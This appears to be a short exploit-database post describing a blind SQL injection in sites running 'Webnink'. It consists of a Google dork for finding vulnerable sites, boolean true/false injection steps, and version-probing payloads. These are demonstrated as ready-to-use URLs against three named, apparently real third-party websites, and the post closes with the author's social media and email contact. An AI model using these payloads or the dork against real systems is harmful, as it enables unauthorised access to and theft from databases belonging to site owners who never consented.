*********************************************************
#Exploit Title: Webnink - Blind Sql Injection
#Date: 2024-01-02
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Webnink"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://www.careerguidancebureau.com/publications-payment.php?Id=28%20and%20true--
* https://www.careerguidancebureau.com/publications-payment.php?Id=28%20and%20false--
* https://www.careerguidancebureau.com/publications-payment.php?Id=28%20and%20substring(@@version,1,1)=1--
### Demo 2:
* https://www.kreepa.org/expo-details.php?Id=9%27%20and%20true--+
* https://www.kreepa.org/expo-details.php?Id=9%27%20and%20false--+
* https://www.kreepa.org/expo-details.php?Id=9%27%20and%20substring(@@version,1,1)=1--+
### Demo 3:
* https://www.careerwayacademy.com/course-details.php?id=12%27%20and%20true--+
* https://www.careerwayacademy.com/course-details.php?id=12%27%20and%20false--+
* https://www.careerwayacademy.com/course-details.php?id=12%27%20and%20substring(@@version,1,1)=1--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************